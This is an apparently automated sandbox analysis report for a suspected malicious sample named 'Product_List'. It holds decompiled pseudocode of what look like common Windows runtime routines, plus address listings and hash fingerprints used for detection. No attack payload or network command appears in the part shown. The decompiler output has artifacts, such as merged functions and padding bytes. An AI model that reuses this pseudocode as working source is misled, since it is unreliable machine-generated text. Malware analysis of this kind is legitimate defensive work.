					_t38 =  *0x18570c0; // 0x0
					while(_t38 != 0x18570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x185b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                      0x0176c96a
                                                      0x0176c974
                                                      0x0176c988
                                                      0x0176c98a
                                                      0x017d7c9d
                                                      0x017d7c9f
                                                      0x017d7ca4
                                                      0x017d7cae
                                                      0x017d7cf0
                                                      0x017d7cf5
                                                      0x017d7cfa
                                                      0x0176c992
                                                      0x0176c996
                                                      0x0176c997
                                                      0x0176c998
                                                      0x0176c9a3
                                                      0x0176c9a3
                                                      0x017d7cb0
                                                      0x017d7cb7
                                                      0x017d7cbb
                                                      0x00000000
                                                      0x00000000
                                                      0x017d7cbd
                                                      0x017d7ce8
                                                      0x017d7cc5
                                                      0x017d7cc8
                                                      0x017d7cca
                                                      0x017d7cd0
                                                      0x017d7cd6
                                                      0x017d7cde
                                                      0x017d7ce4
                                                      0x017d7ce4
                                                      0x017d7cd0
                                                      0x00000000
                                                      0x017d7ce8
                                                      0x0176c990
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6796b27d5e339ae7fef432d4a3f9e1898c0b6f55aa5b268a618c7ee5fa55bbef
                                                      • Instruction ID: cd27ccd932e448f16809aaaa03371db2cf59eb53159c13d7edec61ddf98384ad
                                                      • Opcode Fuzzy Hash: 6796b27d5e339ae7fef432d4a3f9e1898c0b6f55aa5b268a618c7ee5fa55bbef
                                                      • Instruction Fuzzy Hash: 1C11C23130070A9FC765AE2CCC8992BFBF9FB88718B400569ED4983651EB24ED10CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179002D Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0179002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01787D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01787D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01787D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01787D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                      0x01790032
                                                      0x01790037
                                                      0x01790043
                                                      0x017d4b3a
                                                      0x01790049
                                                      0x01790049
                                                      0x01790049
                                                      0x0179004e
                                                      0x01790053
                                                      0x017d4b48
                                                      0x017d4b5a
                                                      0x017d4b4a
                                                      0x017d4b53
                                                      0x017d4b53
                                                      0x017d4b5f
                                                      0x00000000
                                                      0x017d4b61
                                                      0x00000000
                                                      0x017d4b61
                                                      0x01790059
                                                      0x01790059
                                                      0x01790060
                                                      0x017d4b6f
                                                      0x017d4b6f
                                                      0x01790069
                                                      0x017d4b83
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4b90
                                                      0x017d4b9b
                                                      0x017d4b9b
                                                      0x017d4ba4
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4baa
                                                      0x00000000
                                                      0x0179006f
                                                      0x0179006f
                                                      0x00000000
                                                      0x0179006f
                                                      0x01790069

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: a30b25bec61a67fe780e880693ece40e08fbf7e94eb58e59363e87a8d34e4b69
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: E911C832615685CFEB239B2CD948B35F7E9AF51754F1900E0ED16C7A92D738D841C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017FC450 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E017FC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E017A9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E017A95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E017A95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E017A95D0();
				return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                      0x017fc458
                                                      0x017fc45d
                                                      0x017fc466
                                                      0x017fc468
                                                      0x017fc469
                                                      0x017fc46a
                                                      0x017fc46b
                                                      0x017fc46e
                                                      0x017fc46f
                                                      0x017fc471
                                                      0x017fc476
                                                      0x017fc476
                                                      0x017fc47c
                                                      0x017fc47e
                                                      0x017fc480
                                                      0x017fc480
                                                      0x017fc483
                                                      0x017fc484
                                                      0x017fc486
                                                      0x017fc488
                                                      0x017fc48f
                                                      0x017fc491
                                                      0x017fc493
                                                      0x017fc493
                                                      0x017fc48f
                                                      0x017fc498
                                                      0x017fc49e
                                                      0x017fc4ad
                                                      0x017fc4ad
                                                      0x017fc4b2
                                                      0x017fc4b4
                                                      0x017fc4cd

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 86c6d4537ca5f557e869c718e07efe2f9edffe4878497111a67958e8612cc6af
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: 9A01967118050ABFE715AF69CC85E63FB6DFF94354F504529F354426A4C721ACA0C6A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01769080 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E01769080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18585ec;
				E01782280(_t48, 0x18585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L0177FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x185538c; // 0x77e16828
					if( *_t84 != 0x1855388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x183f6e8);
						E017BD0E8(0x18585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E018388F5(_t80, _t85, 0x1855388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18586c0; // 0x12407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01782280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E018388F5(0x18585ec, _t85, 0x1855388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L017AAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x185b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18584c0;
																			if(_t82 >=  *0x18584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01839063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0176922A(_t99);
										_t64 = E01787D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01838B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18586c0; // 0x12407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18586bc;
													_t87 = 0x18586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01769240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18586c4;
												_t87 = 0x18586c0;
												L27:
												E01799B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E017BD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1855388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x185538c = _t51;
						goto L6;
					}
				}
			}




















                                                      0x01769082
                                                      0x01769083
                                                      0x01769084
                                                      0x01769085
                                                      0x01769087
                                                      0x01769096
                                                      0x01769098
                                                      0x01769098
                                                      0x0176909e
                                                      0x017690a8
                                                      0x017690e7
                                                      0x017690e7
                                                      0x017690aa
                                                      0x017690b0
                                                      0x017690b7
                                                      0x017690bd
                                                      0x017690dd
                                                      0x017690e6
                                                      0x017690bf
                                                      0x017690bf
                                                      0x017690c7
                                                      0x017690cf
                                                      0x017690f1
                                                      0x017690f2
                                                      0x017690f4
                                                      0x017690f5
                                                      0x017690f6
                                                      0x017690f7
                                                      0x017690f8
                                                      0x017690f9
                                                      0x017690fa
                                                      0x017690fb
                                                      0x017690fc
                                                      0x017690fd
                                                      0x017690fe
                                                      0x017690ff
                                                      0x01769100
                                                      0x01769102
                                                      0x01769107
                                                      0x0176910c
                                                      0x01769110
                                                      0x01769113
                                                      0x01769115
                                                      0x01769136
                                                      0x0176913f
                                                      0x01769143
                                                      0x017c37e4
                                                      0x017c37e4
                                                      0x01769117
                                                      0x01769117
                                                      0x0176911d
                                                      0x00000000
                                                      0x0176911f
                                                      0x0176911f
                                                      0x01769125
                                                      0x00000000
                                                      0x01769127
                                                      0x0176912d
                                                      0x01769130
                                                      0x01769134
                                                      0x01769158
                                                      0x0176915d
                                                      0x01769161
                                                      0x01769168
                                                      0x017c3715
                                                      0x0176916e
                                                      0x0176916e
                                                      0x01769175
                                                      0x01769177
                                                      0x0176917e
                                                      0x0176917f
                                                      0x01769182
                                                      0x01769182
                                                      0x01769187
                                                      0x01769187
                                                      0x0176918a
                                                      0x0176918d
                                                      0x0176918f
                                                      0x01769192
                                                      0x01769195
                                                      0x01769198
                                                      0x01769198
                                                      0x01769198
                                                      0x0176919a
                                                      0x00000000
                                                      0x00000000
                                                      0x017c371f
                                                      0x017c3721
                                                      0x017c3727
                                                      0x017c372f
                                                      0x017c3733
                                                      0x017c3735
                                                      0x017c3738
                                                      0x017c373b
                                                      0x017c373d
                                                      0x017c3740
                                                      0x00000000
                                                      0x017c3746
                                                      0x017c3746
                                                      0x017c3749
                                                      0x00000000
                                                      0x017c374f
                                                      0x017c374f
                                                      0x017c3751
                                                      0x017c3757
                                                      0x017c3759
                                                      0x017c375c
                                                      0x017c375c
                                                      0x017c375e
                                                      0x017c375e
                                                      0x017c3761
                                                      0x017c3764
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3766
                                                      0x017c3768
                                                      0x017c37a3
                                                      0x017c37a3
                                                      0x017c37a5
                                                      0x017c37a7
                                                      0x017c37ad
                                                      0x017c37b0
                                                      0x017c37b2
                                                      0x017c37bc
                                                      0x017c37c2
                                                      0x017c37c2
                                                      0x017c37b2
                                                      0x01769187
                                                      0x01769187
                                                      0x0176918a
                                                      0x0176918d
                                                      0x0176918f
                                                      0x01769192
                                                      0x01769195
                                                      0x00000000
                                                      0x01769195
                                                      0x00000000
                                                      0x017c376a
                                                      0x017c376a
                                                      0x017c376a
                                                      0x017c376c
                                                      0x017c376c
                                                      0x017c376f
                                                      0x017c3775
                                                      0x00000000
                                                      0x00000000
                                                      0x017c3777
                                                      0x017c3779
                                                      0x017c3782
                                                      0x017c3787
                                                      0x017c3789
                                                      0x017c3790
                                                      0x017c3790
                                                      0x017c378b
                                                      0x017c378b
                                                      0x017c378b
                                                      0x017c3792
                                                      0x017c3795
                                                      0x00000000
                                                      0x017c3795
                                                      0x00000000
                                                      0x017c3779
                                                      0x017c3798
                                                      0x00000000
                                                      0x017c3798
                                                      0x00000000
                                                      0x017c3768
                                                      0x017c379b
                                                      0x017c379b
                                                      0x017c3751
                                                      0x017c3749
                                                      0x00000000
                                                      0x017c3740
                                                      0x017691a0
                                                      0x017691a3
                                                      0x017691a9
                                                      0x017691b0
                                                      0x00000000
                                                      0x017691b0
                                                      0x01769187
                                                      0x017691b4
                                                      0x017691b4
                                                      0x017691bb
                                                      0x017691c0
                                                      0x017691c5
                                                      0x017691c7
                                                      0x017c37da
                                                      0x017691cd
                                                      0x017691cd
                                                      0x017691cd
                                                      0x017691d2
                                                      0x017691d5
                                                      0x01769239
                                                      0x01769239
                                                      0x017691d7
                                                      0x017691db
                                                      0x017691e1
                                                      0x017691e7
                                                      0x017691fd
                                                      0x01769203
                                                      0x0176921e
                                                      0x01769223
                                                      0x00000000
                                                      0x01769205
                                                      0x01769205
                                                      0x01769208
                                                      0x0176920c
                                                      0x01769214
                                                      0x01769214
                                                      0x0176920c
                                                      0x017691e9
                                                      0x017691e9
                                                      0x017691ee
                                                      0x017691f3
                                                      0x017691f3
                                                      0x017691f3
                                                      0x017691e7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01769134
                                                      0x01769125
                                                      0x0176911d
                                                      0x0176914e
                                                      0x017690d1
                                                      0x017690d1
                                                      0x017690d3
                                                      0x017690d6
                                                      0x017690d8
                                                      0x00000000
                                                      0x017690d8
                                                      0x017690cf

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44781f0a7c71825f59070cdcaadb1e64c43b5bd44debe9b9d921d2202e12809b
                                                      • Instruction ID: 73f9c50c3144f6a2861ec80a1d5e13ce223cc7a49cf27c3fdfc3f2e4d0ae8552
                                                      • Opcode Fuzzy Hash: 44781f0a7c71825f59070cdcaadb1e64c43b5bd44debe9b9d921d2202e12809b
                                                      • Instruction Fuzzy Hash: D601AF726026068FD3259F18D840B22FBADFB86329F254066EA05CB6A6C774DD41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01834015 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E01834015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01782280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01782280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18586ac);
					E0176F900(0x18586d4, _t28);
					L0177FFB0(0x18586ac, _t28, 0x18586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L0177FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                      0x0183401a
                                                      0x0183401e
                                                      0x01834023
                                                      0x01834028
                                                      0x01834029
                                                      0x0183402b
                                                      0x0183402f
                                                      0x01834043
                                                      0x01834046
                                                      0x01834051
                                                      0x01834057
                                                      0x0183405f
                                                      0x01834062
                                                      0x01834067
                                                      0x0183406f
                                                      0x0183407c
                                                      0x0183407c
                                                      0x0183408c
                                                      0x0183408c
                                                      0x01834097

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72402989c52fc6632662b1a823063d99a3d9927747c0bc43230b709387bad581
                                                      • Instruction ID: 7ec1e7b306569689cbc774f3be61dc4e4df906f23775f8e0eee5f69b9638dc15
                                                      • Opcode Fuzzy Hash: 72402989c52fc6632662b1a823063d99a3d9927747c0bc43230b709387bad581
                                                      • Instruction Fuzzy Hash: 27017C72241A46BFD751BB79CE88E13F7ACEB96760B000229F518C7A11CB24ED11CAE4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0182138A Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E0182138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x185d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01787D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L017AB640(E017A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                      0x0182138a
                                                      0x0182138a
                                                      0x01821399
                                                      0x018213a3
                                                      0x018213a8
                                                      0x018213aa
                                                      0x018213b5
                                                      0x018213bb
                                                      0x018213c3
                                                      0x018213c6
                                                      0x018213c9
                                                      0x018213d4
                                                      0x018213e6
                                                      0x018213d6
                                                      0x018213df
                                                      0x018213df
                                                      0x018213f1
                                                      0x018213f2
                                                      0x018213f4
                                                      0x0182140e

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d637434bba09fc6fff649030295eac1f5f78a22b28c9d00d03a575339bb84a7e
                                                      • Instruction ID: 9a5e54f78c8985aae101d51c069a065775bc2894b35cb17bd08d3613d7f5d0ea
                                                      • Opcode Fuzzy Hash: d637434bba09fc6fff649030295eac1f5f78a22b28c9d00d03a575339bb84a7e
                                                      • Instruction Fuzzy Hash: 4C019271A00218AFCB14DFA8D849EAEBBB8EF44700F504156F900EB280D6749B40CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017658EC Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E017658EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x185d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1745c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01765943() != 0 &&  *0x1855320 > 5) {
					E017E7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E017E7B5E( &_v28, _t28);
					_t11 = E017E7B9C(0x1855320, 0x174bf15,  &_v28, _t22, 4,  &_v76);
				}
				return L017AB640(_t11, _t17, _v8 ^ _t29, 0x174bf15, _t27, _t28);
			}















                                                      0x017658fb
                                                      0x017658fe
                                                      0x01765906
                                                      0x0176590a
                                                      0x0176593c
                                                      0x0176593c
                                                      0x0176590c
                                                      0x0176590c
                                                      0x01765911
                                                      0x00000000
                                                      0x01765913
                                                      0x01765913
                                                      0x01765913
                                                      0x01765911
                                                      0x0176591d
                                                      0x017c1035
                                                      0x017c103c
                                                      0x017c103f
                                                      0x017c1056
                                                      0x017c1056
                                                      0x0176593b

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bce03785754eeae3927579e65ebfb0cc92b79af92f244b651434f036920d9f5
                                                      • Instruction ID: e907499dcfe25a269562388d5abf09471ae9d9b1efea8aceb48921ab7593324e
                                                      • Opcode Fuzzy Hash: 6bce03785754eeae3927579e65ebfb0cc92b79af92f244b651434f036920d9f5
                                                      • Instruction Fuzzy Hash: 0101A231A006059BCB14EA69D8089AEF7EDEF86260F9501A99E05D7248EE30EE05C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177B02A Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0177B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01787D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E017E7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                      0x0177b037
                                                      0x0177b039
                                                      0x0177b03b
                                                      0x0177b040
                                                      0x017ca60e
                                                      0x00000000
                                                      0x00000000
                                                      0x017ca61d
                                                      0x0177b04b
                                                      0x0177b04e
                                                      0x017ca627
                                                      0x017ca634
                                                      0x00000000
                                                      0x00000000
                                                      0x017ca641
                                                      0x017ca653
                                                      0x017ca643
                                                      0x017ca64c
                                                      0x017ca64c
                                                      0x017ca65b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017ca66c
                                                      0x0177b057
                                                      0x0177b057
                                                      0x0177b057
                                                      0x0177b046
                                                      0x0177b046
                                                      0x00000000

                                                      Memory Dump Source
